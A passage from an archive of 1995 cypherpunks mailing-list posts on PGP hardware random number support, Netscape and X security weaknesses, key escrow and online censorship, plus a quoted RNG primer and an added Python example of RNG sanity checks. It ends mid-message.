> Random numbers for use in computer programs can be classified into 3
> different categories:
> 
>    * Truly random numbers:
>      Truly random numbers obviously cannot be produced by computer
>      programs, they must be supplied by an external source like
>      radioactive decay. Such sequences are available (e.g. on
>      magnetic tape), but clumsy to use and often not sufficient in
>      terms of speed and number.
>    * Pseudorandom numbers:
>      A sequence of numbers is generated by an algorithm in a way
>      that the resulting numbers look statistically independent and
>      uniformly distributed. This is the prevailing method used in
>      random number generators.
>    * Quasirandom numbers:
>      These are generated by algorithms tuned to optimize the
>      sequence's uniform distribution, which can improve the accuracy
>      of Monte-Carlo integration. These numbers are not independent
>      and thus cannot be used generally.
> 
> Other than uniform distributions can be generated by suitable
> transformations of the basic uniformly distributed sequence.
> Numerical libraries often offer a rich set of distributions.
> 
> Desirable properties of (pseudo) random numbers
> 
> A good random number generator (RNG) should have the following
> properties:
> 
>    * Good statistical properties:
>      There are theoretical and empirical tests to judge an RNG's
>      quality. Every generator should always be tested with one's
>      actual application: the standard tests can only disqualify a
>      RNG and may not check for the properties the application
>      requires.
>    * Long period:
>      RNG algorithms are iteration formulae. The state is often
>      stored in a single integer, in this case there cannot be more
>      states than representable integers (recall 2^30 \approx 10^9).
>    * Reproducibility:
>      All generators can initialize the sequence by a starting seed.
>      Storing and reloading a generator's internal state is also
>      useful.
>    * Portability:
>      This concerns both programming language (e.g. Fortran 90 or
>      ANSI C) as well as machine-dependent (e.g. floating point
>      representation) aspects. The ideal RNG produces (bit-)
>      identical results in every environment.
>    * Efficient implementation:
>      This may be irrelevant for "general purpose" generators. But
>      time-critical applications may require inline coding and/or the
>      generation of whole vectors of random numbers at once. Vector
>      and parallel computers need special RNG methods.
> 
> Which of these aspects is most important depends on the actual
> application, of course.
> 
> Miscellaneous RNG material
> 
> What follows is a collection of material on pseudorandom number
> generators. I hope to improve this soon...
> 
>    * The RNG Chapter of Designing and Building Parallel Programs by
>      Ian Foster
>    * The pLab pages at Salzburg University
>    * The RNG Document of ORNL's Computational Science Education
>      Project
>    * My publications on RNGs are available online, also some slides
>    * My BiBTeX-bibliographies of articles and books on random number
>      generation
>    * The RAND/VP package contains a RNG tuned for our vector
>      computer SNI S600/20
>    * The NAG and IMSL Fortran libraries contain random number
>      generators for various distributions
>    * Popular public-domain sources include the StatLib and NetLib
>      libraries
>    * My publications on RNGs and the RANEXP library are available by
>      anonymous ftp also.
>      URL: ftp://ftp.rz.uni-karlsruhe.de/pub/misc/random/
>    * A good source of RNG codes and articles is the journal Computer
>      Physics Communications, ISSN 0010-4655, published by
>      North-Holland.
> 
> --------------------------------------------------------------------
> Michael Hennecke / 21.07.1995







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 4 Oct 95 08:36:16 PDT
To: cypherpunks@toad.com
Subject: Re: New Windoze PGP Shell (freeware) worth checking out
Message-ID: <Pine.BSD/.3.91.951004112707.9222A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



The program can be found at http://iquest.com/~aegisrc/utils.shtml


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mg5n+alias!rngaugp@andrew.cmu.edu
Date: Wed, 4 Oct 95 12:06:51 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510041902.MAA00279@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There is now support for using a hardware random number generator
with the most recent versions of PGP.

Versions pgp 2.62 unofficial international versions,
	 pgp 2.62 international version
and	 pgp 2.62 (from mit)
are supported. The files for this modification of pgp
are at the export controlled ftp site in the directory:

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_????????/pgp/rng

the files are:	
		rg262mit.zip	
		rg262i.zip	(Can be used in Canada)
		rg262ui.zip	(Can be used in Canada)

Sources for the modifications are included. Executables are
included for OS/2 and MSDOS.

In the above ????????? varies because of the export control
scheme. To get the files if you are in the U.S. and Canada
first get the file ftp://ftp.csn.net/mpj/README.MPJ and
follow the instructions.

Many thanks to mpj@netcom.com for providing storage at the
export controlled ftp site.

Here is the README file that comes with the modifications.
- ----------------------------------------

	       Hardware Random Number Support for PGP.
			       Version

Ever get tired of typing in keyboard timing strokes while generating a
PGP key? Ever want to use PGP unattended, but be foiled because there is
no one there to type the keyboard timing strokes?

Ever wonder if PGP's method of generating random numbers might have some
subtle flaw which would expose it to cryptanalysis?


This is a modified version of PGP which allows it to be used with a
hardware random number generator. Two kinds of RNG are supported: 
First, any RNG with a IO driver that makes the RNG look like a file that
can be opened (fopen) such that each byte read is a random byte. Second,
a bus RNG under the x86 architecture such that random bytes may be
obtained with a simple "IN" instruction. The CALNET/NEWBRIDGE RNG is an
example of this kind of RNG. A crude sanity check is done to check that
the bytes appear to be random.

To use the hardware random number generator feature of this software,
you must define _ONE_ of the new configuration file parameters RNGDRIVER
or RNGPORT in config.txt or from the command line.  If you have a RNG of
the first type, define RNGDRIVER to be the complete path to the RNG
driver. If you have a RNG of the second type, define RNGPORT to be the
port number from which to get random numbers. You can use hexadecimal
i.e. 0x300.

Examples:

RNGDRIVER=/dev/random

or

RNGPORT=0x300


If neither of these are defined the modified PGP will get its RANDOM
numbers in exactly the same way that regular PGP does, through keyboard
timing. If one of these parameters is set correctly, the modified PGP
will get its random numbers from the RNG and you will never be asked to
type keyboard timing strokes.



I have compiled a version of PGP that supports a hardware RNG for MSDOS
and OS/2. I have included the source files for each file that has been
modified. To compile get the original source files, put in the modified
files and compile as usual. 

The new source files and this software are covered by the same license
as the original, LICENCE.

There are similar available modifications for the other two major
versions  of PGP, OTHERS.

If someone out there has a PSI-LINE random number generator that
attaches to a RS-232 port as if it were a modem,  please test it with
this software. If the software line characteristics (baud rate, flow
control, stopbits, etc.) are set correctly (You will have to do this
yourself, as this modified PGP does not do this) then all you should
have to do is set RNGDRIVER to the RS232 device name. I have not tested
this because I do not have this kind of RNG.

Someone may wish to add code to set the software line characteristics,
but this may be difficult, as the code would vary by operating system
and even among the various flavors of UNIX.

If you do such a test please report the results to alt.security.pgp and
cypherpunks.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
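
The README above does not say what its "crude sanity check" consists of. As an added example (not code from the modified PGP), here is one way to read bytes from an RNGDRIVER-style file and reject output that is obviously broken; the three checks, their thresholds, the function names and the test streams are all assumptions.

```python
import hashlib
from collections import Counter

MIN_SAMPLE = 1024  # assumed minimum; the statistics are meaningless on less


def read_rng(path, count):
    """Read `count` bytes from a file-like RNG where every byte read is random."""
    data = bytearray()
    with open(path, "rb", buffering=0) as dev:   # unbuffered: consume only what is used
        while len(data) < count:
            chunk = dev.read(count - len(data))
            if not chunk:                        # device closed or file too short
                raise OSError("RNG source returned no data")
            data += chunk
    return bytes(data)


def sanity_check(sample):
    """Return the names of the failed checks (empty list = nothing obviously wrong).

    Passing says only that the source is not stuck, heavily biased or a plain
    counter; it is not evidence that the output is unpredictable.
    """
    n = len(sample)
    if n < MIN_SAMPLE:
        raise ValueError("need at least %d bytes" % MIN_SAMPLE)
    failures = []

    # 1. Bit balance: about half of all bits should be 1 (assumed tolerance 2%).
    ones = sum(bin(b).count("1") for b in sample)
    if abs(ones - 4 * n) > 0.02 * 8 * n:
        failures.append("bit-bias")

    # 2. Chi-square over the 256 byte values (255 degrees of freedom, mean 255).
    #    Far above: skewed distribution. Far below: too regular, e.g. a counter.
    counts = Counter(sample)
    expected = n / 256
    chi2 = sum((counts.get(v, 0) - expected) ** 2 / expected for v in range(256))
    if chi2 > 400 or chi2 < 150:
        failures.append("byte-distribution")

    # 3. Longest run of one repeated byte: a stuck bus or dead device repeats.
    longest = run = 1
    for prev, cur in zip(sample, sample[1:]):
        run = run + 1 if cur == prev else 1
        longest = max(longest, run)
    if longest > 4:
        failures.append("stuck-run")
    return failures


def constructed_stream(count):
    """Constructed stand-in for a healthy source so the example runs without hardware."""
    out = bytearray()
    counter = 0
    while len(out) < count:
        out += hashlib.sha256(counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:count])


if __name__ == "__main__":
    for name, data in [("healthy (constructed)", constructed_stream(4096)),
                       ("stuck at 0x00", b"\x00" * 4096),
                       ("byte counter", bytes(range(256)) * 16)]:
        print(name, sanity_check(data))
```

On a system that has the README's example device, `sanity_check(read_rng("/dev/random", 4096))` applies the same checks to real output.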




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 4 Oct 95 04:06:47 PDT
To: Jamie Zawinski <jwz@netscape.com>
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <306C804A.3CE1CFB@netscape.com>
Message-ID: <199510041102.MAA17689@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| Jyri Kaljundi wrote:
| > 
| > There's a huge hole in the Netscape remote control mechanism for the
| > X-Windows based clients.
| > Potential impact : anybody can become any user that uses Netscape on any
| > system without sufficient X security.
| 
| Did you bother to read the spec?  This doesn't matter; if I can
| connect to your X server at all, you have already lost.  The spec
| (at http://home.netscape.com/newsref/std/x-remote.html) contains:

[snip]

This is all true, in a way.

But there is a growing number of applications that contain this kind
of remote execution capabilities, and whose security is dependent on
Xauth. I believe that X is soon becoming the weakest link in the
security chain.

I guess we don't have to discuss the quality of the 'magic cookie'
RNG's, do we? Not to mention the fact that the cookie is in effect
a password that is perfectly snoopable.

How common are DES-based Xauth-schemes? They are not used very
much, as far as I know. And if they are, as in XDM, then again, what
about the RNG?

I guess this is just the distinction of breaking the glass window
in the back of the house, or to pick up the front door key from 
beneath the "Welcome" door mat, but anyway.

-Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ann Beeson <beeson@aclu.org>
Date: Wed, 4 Oct 95 09:10:25 PDT
To: infoaclu@aclu.org
Subject: ACLU Cyber-Liberties Update 10/4
Message-ID: <199510041605.MAA08420@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


October 4, 1995 
ACLU CYBER-LIBERTIES UPDATE                        **Premiere Issue** 
A bi-weekly online 'zine on cyber-liberties cases and controversies at the
state and federal level. 
---------------------------------------------------------------------------------------------------------------------- 
FEDERAL PAGE (Congress/Agency/Court Cases) 
---------------------------------------------------------------------------------------------------------------------- 
*	"Virtual" Child Pornography Bill is Overbroad and Fails to Protect Real
Children 
 
Despite the FBI's apparent success in raiding alleged child pornographers
on America Online, Senator Orrin Hatch decided we needed a new child
pornography law.  Hatch's bill would expand the existing child porn law to
include materials that are: 
	-visual depictions of what "appears to be . . . a minor engaging in
sexually explicit conduct;" and 
	-visual depictions "advertised, promoted, presented, described, or
distributed in such a manner that conveys the impression that the material
is or contains a visual depiction of a minor engaging in sexually explicit
conduct." 
In its effort to outlaw "virtual" child pornography, the bill would
criminalize a wide range of constitutionally protected expression. 
 
Hatch attempts to justify the new bill by reference to a widely-publicized
Canadian case in which a pornographer copied pictures of clothed children
from catalogs and morphed them into child pornography.  Senator Hatch
claims that the case would not be covered under the existing federal child
porn statute, but that issue has never been decided by a United States
court.  While the application of the existing statute to these facts is far
from clear, the Hatch bill covers *much more* than just this case scenario.
 The statute would cover *any* image of a child engaged in sexual behavior,
including non-computer-generated drawings, cartoons, and visual images
created without the use of photos of real children or even real adults. 
 
In upholding child pornography laws, the Supreme Court has stated that "the
nature of the harm to be combated requires that the state offense be
limited to works that visually depict sexual conduct by children below a
specified age. . . .  [T]he distribution of descriptions or depictions of
sexual conduct, not otherwise obscene, which do not involve live
performance or photographic or other visual reproduction of live
performances, retains First Amendment protection." _New York v. Ferber_,
458 U.S. 747, 764-65 (1982). 
 
Hatch's "virtual child porn" law is clearly unconstitutional because it
would outlaw images produced without any involvement by an actual child. 
 
Bruce Taylor of the National Law Center for Families and Children argued at
a recent conference at Brooklyn Law School that a "virtual child porn" law
was needed because pedophiles use virtual porn to lure children.  Under
that rationale, if a pedophile used a piece of candy to lure a child into
sex we would have to outlaw candy.  In a free society, we cannot use
censorship laws to try to control "bad thoughts."  Outlawing all images
that might be stimulating to pedophiles would require a massive amount of
censorship and would *not* cure pedophilia. 
 
The ACLU reiterates its position on child pornography laws: 
 
"The ACLU believes that the First Amendment protects the dissemination of
all forms of communication.  The ACLU opposes on First Amendment grounds
laws that restrict the production and distribution of any printed and
visual materials even when some of the producers of those materials are
punishable under criminal law." 
 
"The ACLU views the use of children in the production of visual depictions
of sexually explicit conduct as a violation of children's rights when such
use is highly likely to cause:  a) substantial physical harm or, b)
substantial and continuing emotional or psychological harm.  Government
quite properly has the means to protect the interest of children in these
situations by the use of criminal prosecution of those persons who are
likely to cause such harm to children." 
 
The Hatch proposal only demonstrates the dangers of trying to protect
children indirectly through censorship laws. 
---------------------------------------------------------------------------------------------------------------------- 
*	Clipper II?  Your electronic privacy rights are at stake . . . again. 
 
In 1993, the ACLU and an overwhelming majority of industry condemned the
Clipper Chip -- the Administration's key escrow encryption scheme to equip
every telecommunications device with a "chip" that would allow anyone to
secure his private communications as long as the U.S. government held the
descrambling key.  The government insisted that Clipper would be merely a
voluntary standard, but government documents requested under the Freedom of
Information Act now confirm the suspicions of civil liberties advocates
that the government really believes key escrowed encryption will only meet
law enforcement standards if it is mandatory.  (See
URL:http://www.epic.org/crypto/) 
 
Now the Administration has returned with another scheme -- commercial key
escrow ("Clipper II").  At close range, Clipper II is a lot like Clipper I:

	*	Although supposedly "independent" of the government, key escrow agents
will have to meet standards set by the U.S. government, and will have to
reside in the U.S. or in a country with which the U.S. has entered a
bilateral agreement. 
	*	The proposal provides no privacy safeguards to prevent the compromise of
the key escrow agent or the key. 
	*	Offered as a "voluntary" standard, the proposal nevertheless forbids
interoperability with non-escrowed encryption in exported products. 
	*	While the government says it recognizes industry's need for strong
encryption, the proposal limits exportable encryption to 64 bits -- a
length widely recognized to provide inadequate security. 
 
On September 6, 7, and 15, 1995, the ACLU attended meetings held by the
National Institute for Standards and Technology (NIST) in Gaithersburg,
Maryland.  The meetings were called to solicit input from industry on the
Clipper II proposal.  Draft export criteria were considered on September
6-7, and the general industry response was very lukewarm -- except for a
few industries that have been meeting with the Administration and are
preparing to announce products that would fit the suggested criteria.  The
ACLU led one working group to vote 7-7 in favor of condemning the entire
proposal. 
 
On September 15th, NIST discussed the implementation of a federal key
escrow encryption standard.  By requiring federal agencies to use
commercial key escrow as a FIPS (Federal Information Processing Standard),
the Administration clearly hopes to drive industry to accept commercial key
escrow as the export standard as well. 
 
The ACLU issued the following statement on the current key escrow proposal:

 
The American Civil Liberties Union's Position 
on the Administration's Current Key Escrow Proposal: 
 
	*	Encryption is speech protected by the First Amendment.  The
Administration's current key escrow proposal, like the Clipper proposal,
continues to tread on the First Amendment rights of American individuals
and businesses to use encryption technologies to secure their private
communications.  The current proposal, like Clipper, should be rejected on
First Amendment grounds alone. 
	*	The current proposal will not accomplish its stated objectives because a
wide array of encryption is available around the globe and will continue to
be employed in place of American government-approved key escrow software. 
	*	The only key escrow proposal that could begin to satisfy the
government's objectives would be an outright ban on the sale of encryption
technologies other than those approved by the government and key escrowed. 
The ACLU fears that the current proposal, and similar proposals, are merely
the first step towards mandatory key escrow of encryption.  Mandatory key
escrow is completely unacceptable to both industry and privacy advocates. 
	*	The Administration should abandon its fruitless and unconstitutional
efforts to control the export of encryption technology.  No legislation is
needed -- the Administration has the power to lift the regulatory
restrictions that it created. 
---------------------------------------------------------------------------------------------------------------------- 
*	Call for Plaintiffs in Suit to Challenge Online Indecency Legislation 
	 
Most of you know that the House and Senate have now passed two different
versions of the telecommunications bill that would outlaw "indecent" speech
over the Internet and other online services.  This fall, a conference
committee of House and Senate members will work out the differences between
the two telco bills and will probably approve some form of online
censorship legislation. [For a copy of the legislation, send a message to
infoaclu@aclu.org, with "Online Indecency Amendments" in the subject line.]

 
While the ACLU and other advocacy groups continue to lobby Congress to
remove the censorship provisions from the telco bill, it is highly likely
that some restriction on online indecency will appear in the final bill
that emerges from the conference committee.  A coalition of civil liberties
organizations are preparing a constitutional challenge to this legislation
now.  The coalition includes the ACLU, Electronic Frontier Foundation,
Electronic Privacy Information Center, Media Access Project, and People for
the American Way.  We plan to be ready to file a lawsuit as soon as the
statute is signed into law -- which could be as early as October. 
 
An important first step in planning the lawsuit is the selection of
plaintiffs.  We need to put together a set of plaintiffs that disprove the
stereotype created by proponents of the legislation that people opposed to
the bill are "pedophiles and pornographers."  We believe that the best
plaintiffs for this challenge will be persons or entities that provide
material that some may deem "indecent" but that has serious artistic,
literary, and educational value to our society.  We need plaintiffs who use
online networks to discuss or distribute works of art, literary classics,
sex education, gay and lesbian literature, human rights reporting,
abortion information, rape counseling, and controversial political speech.
 
Please contact Ann Beeson at the ACLU if your organization is interested in
being a plaintiff in this ground-breaking litigation that will define First
Amendment rights in cyberspace.  212-944-9800 x788, beeson@aclu.org. 
---------------------------------------------------------------------------------------------------------------------- 
STATE PAGE (Legislation/Agency/Court Cases) 
---------------------------------------------------------------------------------------------------------------------- 
*	Overbroad Searches and Seizures Threaten Electronic Privacy 
 
The latest threat to your civil liberties results from law enforcement's
overzealous attempts to find evidence of crime or wrongdoing in cyberspace.
 As we move into the information age, traditional search and seizure rules
will need to be refined to ensure fairness and respect for electronic
privacy rights.  Several recent cases illustrate how privacy rights can be
violated when law enforcement conducts investigations in cyberspace. 
	*	The ACLU recently wrote to America Online to inquire about their
cooperation in the FBI's recent raid of alleged child pornographers who
used the online service.  The ACLU asked, among other things, whether AOL
revealed any information about individual users that was not sought by
subpoena or court order; whether AOL turned over all private e-mail
messages of suspects or whether they turned over only messages related to
the alleged crime; whether AOL also turned over the names, addresses, and
e-mail messages of persons who had communicated with the suspects; whether
AOL set up accounts for the purpose of allowing government investigators to
have access to public chat rooms; and what information AOL regularly keeps
about its users' online activity and how long the information is kept. 
	*	In Cincinnati, Ohio, a computer bulletin board operator filed a civil
rights suit  against the Hamilton County Sheriff's Department after the
department raided the BBS and seized computer equipment, files, and
personal communications.  The case argues that the indiscriminate search
and seizures violated the BBS operator's free speech and privacy rights. 
See _Emerson v. Leis_, S.D. Ohio, No. C-1-95-608.  The subscribers to the
BBS have filed a separate class action suit against the sheriff's
department.  See _Guest v. Leis_, S.D. Ohio.  Law enforcement seized the
entire BBS -- all the hardware, software, files, and private communications
-- in an effort to obtain 45 files on the BBS that were allegedly obscene. 
The case asserts that the 45 files represented only 3% of the total
resources on the board. 
	*	In California, Colorado, and Virginia, the Church of Scientology has
brought three copyright infringement actions against anti-scientologists
who use online communications to criticize the church.  The cases raise
important questions about the breadth of computer communications seizures
in civil cases.  The ACLU of Southern California and the ACLU of Colorado
continue to monitor the cases in their states. 
---------------------------------------------------------------------------------------------------------------------- 
*	Nine States This Year Passed Online Censorship Legislation 
 
While online activists have been busy fighting the pending federal attempts
to censor online communications, state legislatures have been carelessly
crafting online censorship bills at home.  And if you think Congress is
full of Luddites, just wait until you hear what your state legislators have
come up with. 
 
At least nine states (CT, GA, IL, KS, MD, MT, NJ, OK, VA) have passed
legislation this year to regulate online content, and several others
considered such bills, with some still pending.  These bills seek to
criminalize a wide range of online speech and content, including: 
 
	*	speech that "harasses, annoys, or alarms" 
	*	materials deemed "indecent," "obscene" or "harmful to minors" 
	*	information related to "terrorist acts" or "explosive materials" 
 
The state bills, like the federal bills, raise serious free speech and
privacy concerns.  None of the bills indicates an understanding of the
unique nature of the online medium.  Some bills purposefully, and other
bills inadvertently, fail to clarify that only the initiators of the
illegal images may be held liable -- so service providers can be held
liable for the pedophiles and pornographers that use their networks. 
 
The laws would, at best, require service providers to snoop in private
e-mail in order to avoid criminal liability.  At worst, these laws would
force providers to shut down their networks altogether. 
 
The draconian effect of these state bills doesn't stop at state borders.  A
message you post to the Internet today in New York City could travel the
fifty states and the globe by tomorrow.  You'd better be careful that the
message isn't "obscene" according to an Oklahoman, "annoying" to a
Connecticutter, "solicitous" of a minor in Illinois, or related to
"terrorism" as defined by a Georgian. 
 
The wave of online censorship at the state level is far from over.  The
ACLU is considering constitutional challenges to the online censorship laws
that passed this year.  But given the continuing media hype over
"cyber-porn," we are certain to see more censorship bills from the states
next year. 
 
With the help of affiliate offices in fifty states, the ACLU continues to
monitor these state attempts to infringe on your online free speech rights.
 [For a synopsis of all the online censorship bills passed or considered by
the states this year, send a message to infoaclu@aclu.org with "Update of
State Bills" in the subject line of the message.] 
 
---------------------------------------------------------------------------------------------------------------------- 
*	Saving the Best for Last:  Good News on Cyber-Liberties 
 
ARIZONA:  Another troubling application of existing obscenity laws to
cyberspace was averted when charges were dropped against Arizona Department
of Public Safety Officer Lorne Shantz.  Shantz, who ran a community
bulletin board, lost his job and endured several months of hassle and
humiliation when he was arrested for allegedly "obscene" files on the
board.  Shantz maintains that he was unaware of the existence of the files,
which represented only a minuscule fraction of all the information on the
board. 
COLORADO:  Federal Judge John Kane ordered the Church of Scientology to
return computers and hundreds of files seized by Federal marshals and
Scientology officials in a copyright infringement action.  The judge ruled
that the seizures were overbroad, and said that "The public interest is
best served by the free exchange of ideas." 
---------------------------------------------------------------------------------------------------------------------- 
ONLINE RESOURCES FROM THE ACLU 
---------------------------------------------------------------------------------------------------------------------- 
Stay tuned for news on the ACLU's world wide web site, under construction
at http://www.aclu.org.  In the meantime, you can retrieve ACLU documents
via gopher at gopher://aclu.org:6601 (forgive the less-than-updated state
of our gopher -- we've devoted all our resources to WWW construction!).  If
you're on America Online, check out the live chats, auditorium events,
*very* active message boards, and complete news on civil liberties, at
keyword ACLU. 
---------------------------------------------------------------------------------------------------------------------- 
ACLU Cyber-Liberties Update 
Editor: Ann Beeson (beeson@aclu.org) 
American Civil Liberties Union National Office 
132 West 43rd Street 
New York, New York 10036 
 
To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe ACLU" in the subject line of your
message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe ACLU" in the subject line. 
 
For general information about the ACLU, write to infoaclu@aclu.org. 
----------------------------------------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Wed, 4 Oct 95 04:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: More forged cancels
Message-ID: <6495.199510041118@olib>
MIME-Version: 1.0
Content-Type: text/plain



[someone crossposting to a ton of alt groups about spam, the headers:

Newsgroups: news.admin.net-abuse.misc,
soc.culture.german,
soc.culture.jewish,
rec.radio.shortwave,
alt.2600,
mail.cypherpunks,
^^^^^^^^^^^^^^^^^
alt.privacy.anon-server,
alt.stop.spamming,
alt.stop-spamming]


It's started already.  This is because of "mail.cypherpunks" in the
huge newsgroup line?  A news to mail gateway pointing at
cypherpunks@toad.com?

Any chances of disabling this before it gets out of hand?

Who runs the gateway(s)?  Make it read only please!  Or change the
gateway so it doesn't forward if there are other groups on the
newsgroup line or something.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 3 Oct 95 19:20:58 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510031403.ZM151@tofuhut>
Message-ID: <199510040218.MAA04820@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello "Jeff Weinstein" <jsw@netscape.com>
  and Laurent Demailly <dl@hplyot.obspm.fr>,
  and jsw@neon.netscape.com (Jeff Weinstein)
  and cypherpunks@toad.com

"Jeff Weinstein" <jsw@netscape.com> writes:

> On Oct 3,  6:19pm, Laurent Demailly wrote:
> > Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was R
...
> 
>   Yes, I get the idea about spewing the signed hashes everywhere.  The
> problem I have is with the user of PGP.  That will help cypherpunks,
> but does absolutely nothing for most of our millions of users, who
> have no idea what PGP is.

Provided they know at least one person who does, they might well ask
that person to come and verify it for them.

Then again the tampered-with version might not mention PGP-signatures
at all (unless you use it widely in your publicity).

> Perhaps it's enough to assume that if anyone
> is tampering with the distribution, some cypherpunk will stumble across
> it...

You wouldn't want that to be your only argument, but it helps...

If you mention all over the place that the program is PGP-signed
to foil {cr,h}ackers and viruses (*), chances are a lot of people will
ask their one colleague or friend that does know PGP to verify it for them.

Footnotes:
  (*) well, gotta use the four horse{wo,}men, no?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHHu7CxV6mvvBgf5AQHTaAP/W2RKNFiGFc4WjE4saoAls8/Q3N+zlkqm
sDOCga9t9ElSY+jf0XQR/MLxMnuJ4n2H1gbzxnK+ELAbubzRBjNfK+I66IsN89nd
FYEwtnGMSgmmPtO2Y8X0KaFwkdRS8XUVgvnyYVrrhz/6dh3VvcLy5imLBK0fbIrA
r2+u9FL6fuQ=
=2WVg
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 4 Oct 95 04:58:26 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Europe
In-Reply-To: <Pine.HPP.3.91.951001183508.11746A-100000@cor.sos.sll.se>
Message-ID: <199510041155.MAA18408@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| Sweden: The authorities have not yet said anything at all about
| where they stand in the GAK controversy. Probably very few have
| heard about it. 

This may surface in the Swedish media very soon now. There will 
be an article in Ny Teknik next week about these issues, and they
have done some digging at Brussels as well. 

I've tried to get 'Striptease' (discussion TV-program) 
interested as well, but I don't know about them.

So let's go off and think hard about good (culture-related) arguments
why this is a bad idea. We're gonna have to look really nice, and
say some sensible things. :-)

I'm personally attacking the assumption that the police cannot get
to the encrypted traffic without key escrow. Well, why not bug the
keyboard on the originating machine? Etc etc...

I'm currently planning to start an email list discussing this issue,
but I need some proper political clearance first. (They should at
least have a say, I guess.)

Another thing that is currently happening in Sweden is that a 
National Identity Card is being proposed by a major part of the
Swedish industry and other players. This ID-card will be a smart 
card, and is meant to be used in most places.

| The only thing that has come up on a public
| (television) level is demands from the police of access to
| decoded GSM traffic, which I believe is under implementation
| now (the obstacle has mainly been who is going to pay for the
| software updates of the GSM nodes). Sweden has rather strict
| rules for wiretapping (at least officially) and there is no
| public pressure for any change in this.

What strikes me as so strange is that we have an official phonetapping
approval rate of 300/yr, in a population of 8 million people.
How can the phone tapping be so important then?

| I think the basic difference USA vs Sweden in this regard is a
| time delay of some years. We have lots of Internet nodes per
| capita (more than in the US, they say) but the net is still
| largely run by engineers (if only that could last!) and net
| awareness is rare above the age of 30 (i.e. among those who
| have a say).

I think things are moving faster in this area than we might think.
There are certainly things happening at the EU level, according
to the Ny Teknik reporter I spoke with. There is a resolution at
the Council of Ministers, already taken during 1994, apparently.
He was vague about the contents of that resolution, however.

| PS
| Perry, what was your impression of the Swedes you met at the
| IETF meeting in Stockholm last July? I guess they were so
| happy about the new 34 Mbit/s connection to the New World
| that they forgot about the rest?

I'm listening, I'm listening... :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Evans <devans@hclb.demon.co.uk>
Date: Wed, 4 Oct 95 06:58:32 PDT
To: cypherpunks@toad.com
Subject: [Fwd] Security Threat to Internet shopping (DT)
Message-ID: <812839578snx@hclb.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Security threat to Internet shopping

Daily Telegraph (paper edition), 3 October 1995, p. 12


by Robert Uhlig

Home shopping on the Internet is under threat after hackers cracked the
encryption coding used to protect credit card transactions on Netscape,
the most popular software used for access.

A second security flaw, discovered in Microsoft Windows 95's E-Mail
electronic messaging system, has caused alarm.

Ian Goldberg and David Wagner, the hackers, belong to a group called
Cypherpunks and said they had exposed Netscape's weaknesses to show the
ease with which digital money or electronic messages could be
intercepted by criminals, governments or business competitors.

The two computer science students took only a few days to find that the
software used a predictable date and time-based formula to generate a
random encryption code made up of 30 numbers each time a message was
sent.

They then posted their findings on the Internet.

Netscape responded by saying it would share parts of the security code
with security experts including the Massachusetts Institute of
Technology in the hope that this would improve its security.


The company has also released a free updated version of its software
for browsing the World Wide Web part of the Internet.

The company said it also planned to extend the encryption key from 30
digits to 300 digits and use more random information to generate the
key.

However, American law on encryption technology forbids the export of
software containing encryption keys longer than 40 digits, so Internet
users outside America will not be able to download copies of the
software from Netscape.

Visa and Microsoft have been working jointly on what they call Secure
Transaction Technology, which they claim will allow users to buy goods
over the Internet.

However, users of Microsoft's Windows 95 have found that it ignores the
security passwords on private electronic mail sent or received using
software other than Windows 95.


(end)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com ()
Date: Wed, 4 Oct 95 11:38:52 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <199510041836.OAA08014@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain




>MIGUEL DIAZ writes:
>> I don't know about everyone else, but a T-shirt seems a very
>> small reward for uncovering a "hole" in the encryption
>> algorithm of Microsoft products.
>
>I don't know about anyone else, but helping to protect the confidential
>data of millions of users around the world seems a very large reward for
